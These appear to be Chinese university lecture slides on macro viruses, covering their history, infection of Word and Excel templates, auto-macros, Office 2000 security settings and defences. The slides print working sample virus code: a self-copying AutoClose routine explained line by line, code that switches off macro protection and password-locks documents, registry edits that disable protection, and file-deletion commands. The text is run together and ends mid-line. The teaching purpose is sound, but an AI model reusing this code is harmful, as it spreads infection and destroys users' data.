第十讲宏病毒分析

第十讲

宏病毒分析本讲概要本讲将针对宏病毒展开详细的讨论，就宏的概念，宏病毒的历史，宏病毒原理，破化特性和应对之策进行学习。2本讲目标 通过本讲学习，学员应该掌握宏病毒的基本知识，了解宏病毒的机制和防护办法。

与上一讲一样，本章旨在让学员能深入了解宏病毒的传播途径和方式，以利于更加深刻的理解针对宏病毒的防御方法和措施，并非要求学员掌握编写该类型病毒的技能。3宏允许用户在做一些重复工作（例如打开、修改和保存文件）时提高自动化程度很多主流软件包括MicrosoftWord,MicrosoftExcel,MicrosoftPowerPoint,Visio,和LotusAmiPro都有很强的编写宏的功能宏4宏并不局限于同一种软件创建的文件，别的文件类型也同样这使得使用宏编写一个文件传播到另一个文件的病毒程序变得相对简单宏5历史简介第一个宏病毒–LOTUS123简单的宏语言文件的访问是通过菜单条第一个真正的宏病毒–DMV(DocumentMacroVirus)December,1994JoelMcNamara是为了示范宏病毒的可能性而编写的第一个传播的宏病毒–WM/ConceptSummer,19956各种平台以及软件MicrosoftOfficeWinWordExcelPowerPointAccessAmiProCorelDrawPCMacintoshDECAlphaWindowsMacOSSoftWindows7SoftWindows988VBA3,VBA5,VBA6&Excel宏语言Formula–Excel4.0VBA3–Excel5.0WordBasic–Word6.0VBA5–Office97applicationsVBA6–Office2000注

从WinWord7.0a–1st

以后，微软的程序开始自带防病毒的警告机制9VisualBasicforApplicationsJanuary1997微软发布Office97(所有的程序都采用VBA5)Word8.0可以转化（重编码）以前的宏到新的语言版本转化的成功率–90%自动删除常见的宏病毒以阻止它们的传播WM/Concept.A,WM/Wazzu.A

和WM/Npad.A比WordBasic拥有更复杂的语言在OLE2文件中，宏用两种不同的实体方式存在编译过的宏语言体压缩过的宏文本10MainTitle,

60pt.,U/Lcase

LS=.8linesOFFICE中的宏11查看宏VisualBasic编辑器注：调用VB编辑器的快捷方式：Alt-F11查看宏代码可以点击Tools>Macro>VisualBasicEditor12禁用宏打开时针对Office95and97针对Office200013禁用宏打开宏病毒防护功能(Office97)单击Tools>Options在Options

对话框，选中Macrovirusprotection14禁用宏打开宏病毒防护功能(Office2000)单击Tools>Macro>Security在Security

对话框中，选择

High或Medium15调试VBA设置断点断点会在被设置的位置中断程序代码的执行点击代码窗口左侧灰色空白处以设置断点.断点会被高亮显示出来，并且左边有一个红点显示16调试VBA变量的值为了查看一个变量的值，指向该变量（在调试模式下）该变量的值会自动显示出来17MSWord宏病毒Word病毒感染通用模板，该文件的名字为NORMAL.DOT.

该文件维护缺省的和用户自定义的关于MS-Word的设置该文件的修改会影响所有后来用word打开的文件18WORD宏病毒的生命周期某个宏病毒对文档取得控制权该病毒将自身复制到通用模板通用模板在启动时自动调用某些受感染文件会直接查找硬盘上的相关文件有时会使用最近打开的文件列表其它的会把自己复制到模板文件中去（类似通用模板）19MicrosoftExcel病毒这些病毒在执行的时候会将自身复制到其它的Excel文件中去，同时在Excel的启动文件夹中也会留下一份拷贝MSExcel在启动的时候会自动加载在这个文件夹中的所有文件20EXCEL宏病毒的生命周期Excel病毒在启动文件夹XLSTART中生成一个新的启动文件Excel在下次运行时加载该文件(PERSONAL.XLS)Excel不检查文件的后缀名，因此许多病毒遗留下来的文件就不添加后缀名，比如‘BOOK1’21MicrosoftOfficeAutoMacros这些宏的自动执行的特点使得病毒的编写成为可能一个自动执行的宏语句是指在满足某个特定的条件下会自动执行，并不需要用户显式的执行22AutoMacro范例MicrosoftWordAutoOpen

AutoClose

AutoExec

AutoExit

AutoNewMicrosoftExcelAuto_OpenAuto_CloseAuto_ActivateAuto_Deactivate23菜单关联/快捷键将宏和菜单栏的某个选项相关联删除和修改菜单栏中的项目将宏和键盘上的某个键相关联这些方法可以取代使用auto-macros的方法取得控制权24多态宏病毒举例W97M/CLASS.A&W97M/STP利用WinWord的编辑功能修改自身的代码25隐形和加密病毒代码防止被轻易查看到的措施26隐形和加密：续27隐形和加密：续宏病毒存储时代码随机打乱28口令保护WinWord6.0/7.0整个文件可以进行密码保护整个文件被打乱不能访问该文件和其中的宏Office97/2000在文档用密码进行保护后，宏语句还是可以被查看到29文件损坏和手动编辑WinWord6.0在宏语句进行复制的时候有一个程序的错误这会导致WM/NPAD200个不同的变种1997/98-自然的损坏是病毒主要来源Office97可以用VBE进行编辑(ALT+F11)用户手动编辑出来的宏是病毒的主要来源30其它手动删除某些外来的宏语句防病毒产品没有完全将宏病毒正确清除WinWord在复制宏语句时异常终止由于Word6.0的其它原因生成的不正常的宏语句VBA5/VBA6在单一模组中允许多项功能和多个事件操作同时进行Office97/2000–很少有其它情形下产生的宏病毒31混合不同的宏病毒存在在一个用户系统中从其它的宏病毒中”借鉴”从通用模板中的宏语句获取相应的信息相同的病毒往往处在同一类型的模组中,称为‘ThisDocument’或‘ThisWorkbook’32病毒代码SubAutoClose()OnErrorResumeNextApplication.VBE.ActiveVBProject.VBComponents("demo").Export"c:\demo.sys"ForI=1ToNormalTemplate.VBProject.VBComponents.CountIfNormalTemplate.VBProject.VBComponents(I).Name="demo"Then

NormInstall=TrueNextIForI=1ToActiveDocument.VBProject.VBComponents.CountIfActiveDocument.VBProject.VBComponents(I).Name="demo"Then

ActivInstall=TrueNextIIfActivInstall=TrueAndNormInstall=FalseThen SetDobj=NormalTemplate.VBProject

ElseIfActivInstall=FalseAndNormInstall=TrueThen SetDobj=ActiveDocument.VBProjectDobj.VBComponents.Import("c:\demo.sys")EndSub33运行逻辑导出到C:\DEMO.SYS(病毒源代码)检查是否已经安装在NORMAL.DOT-如果是的话,设置变量

检查是否已经安装在活动文件中–如果是的话设置变量如果在NORMAL.DOT中没有的话将C:\DEMO.SYS导入如果在活动文件中没有的话将C:\DEMO.SYS导入34代码分析

SubAutoClose()当文件关闭时会自动启用OnErrorResumeNext如果出错,就接下去执行下面的指示ForI=1ToNormalTemplate.VBProject.VBComponents.Count在normal.dot

中根据模组中的数目重复执行下面的代码35代码分析：续

IfNormalTemplate.VBProject.VBComponents(I).Name="demo"ThenNormInstall=True如果在normal.dot中有名为“demo”的模组，将NormInstall的变量值置为１（true）NextI重复执行一遍ForI=1ToActiveDocument.VBProject.VBComponents.Count根据活动文件中模组的数目重复执行下面的代码36代码分析：续

IfActiveDocument.VBProject.VBComponents(I).Name="demo"ThenActivInstall=True如果在活动文件中有名为“demo”的模组，将ActivInstall的变量值置为１（true）NextI重复执行一次IfActivInstall=TrueAndNormInstall=FalseThenSetDobj=NormalTemplate.VBProject如果在当前文档中安装完毕，但在normal.dot中没有的话，导入到normal.dot文档中37代码分析：续

ElseIfActivInstall=FalseAndNormInstall=TrueThenSetDobj=ActiveDocument.VBProject另外，如果已经安装在normal.dot中而在当前文档中没有的话，导入到当前文档中

Dobj.VBComponents.Import("c:\demo.sys")这将会把c:\demo.sys导入到normal.dot或者活动文档，根据上面设置的变量值决定SetDobj=ActiveDocument.VBProject这样的话，我们只需参考Dobj.VBComponents.Import("c:\demo.sys")`38提示!!!39MainTitle,

60pt.,U/Lcase

LS=.8linesOffice2000和宏的安全性40新特性数字签名安全级别信任源插件和模板防病毒的专用接口Office97的弱点注册表的安全设置41数字签名Office2000(Word/Excel/PowerPoint)现在支持数字签名的VBA宏Access2000不支持数字签名数字签名只被应用到VBA项目的内容文本内容的变化不影响数字签名添加新的宏语句会导致数字签名失效42数字签名43安全级别低安全级别中等安全级别高安全级别44低安全级别没有安全保障宏会完全执行，没有任何警告提示45中等安全级别需要征求用户的意见是否执行宏语句有数字签名的宏会被启用46高安全级别禁用没有签名的宏（不会有警告提示）有数字签名的宏可以被禁止或添加到信任列表中去47默认的安全级别Word2000高安全级别Excel2000&PowerPoint2000中等安全级别Access2000不支持48信任源这是在高安全级别时启用宏的唯一方法添加一个发行者意味着所有该发行者提供的宏都会被自动启用这份列表会被所有的Office程序所共享49信任源50插件和模板对待安装的插件和模板的方法是和普通文档一样的默认情况下，该选项是被禁止的51防毒软件接口在文件被打开之前，调用注册过的扫描器来扫描该文件52Office97的弱点Word97模板的安全补丁Word97&右键快捷打印Excel97调用功能的补丁53Word97模板的安全补丁历史针对包含带宏的模板的文档，Word97打开这种文档中包含的宏时并不进行任何提示纠正措施安全级别保护和宏扫描应用于附加的模板54Word97&右键快捷打印历史当文件在使用右键快捷打印功能时，关于宏病毒的防护功能并没有被启用纠正措施安全级别保护和宏扫描应用于右键快捷打印55Excel97调用功能的补丁历史Excel工作簿可以调用动态链接库针对这种情况的宏，保护措施并没有给出预警纠正措施将工作簿的调用功能禁止56注册表的安全设置关于安全设置的注册表位置HKEY_CURRENT_USER\Software\Microsoft\Office\NN.0\Word\Security57Office2000白皮书HTTP://OFFICE.MICROSOFT.COM/DOWNLOADS/2000/O2KSEC.ASPX58推荐的设置将所有的Office2000程序的安全级别设置为高禁用‘Trustallinstalledadd-insandtemplates’选项将Excel4.0-类型的宏转化为VBA将所有的宏签名，包括插件和模板在注册表中的键值设置并锁定为高安全级别使用防毒软件进行对所有使用的文件进行扫描59Office宏病毒的某些症状文件的大小增加了

工具栏上的菜单条被改动过打开一个文件时，CPU利用率变的很高无法打开最近使用过的一些文档60建议的清除措施使用专业的防毒软件进行对宏病毒的自动清除61MainTitle,

60pt.,U/Lcase

LS=.8lines宏病毒的代码示范62SubAutoOpen()Options.VirusProtection=FalseOptions.ConfirmConversions=FalseOptions.SaveNormalPrompt=FalseIfDay(Now)=Hour(Now)ThenSetFunnyShit=ActiveDocumentFunnyShit.Password="ZeRg1.0"ActiveDocument.SaveEndIf与自动执行的宏关联举例:W97M_ZERG.AVirusCode63SYSTEM.PRIVATEPROFILESTRING("","HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\OFFICE\8.0\NEWUSERSETTINGS\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")=""注册表修改举例:WM_TRISTATE64KILL"C:\*.*"KILL"C:\MYDOCUMENTS\*.*"KILL"C:\WIN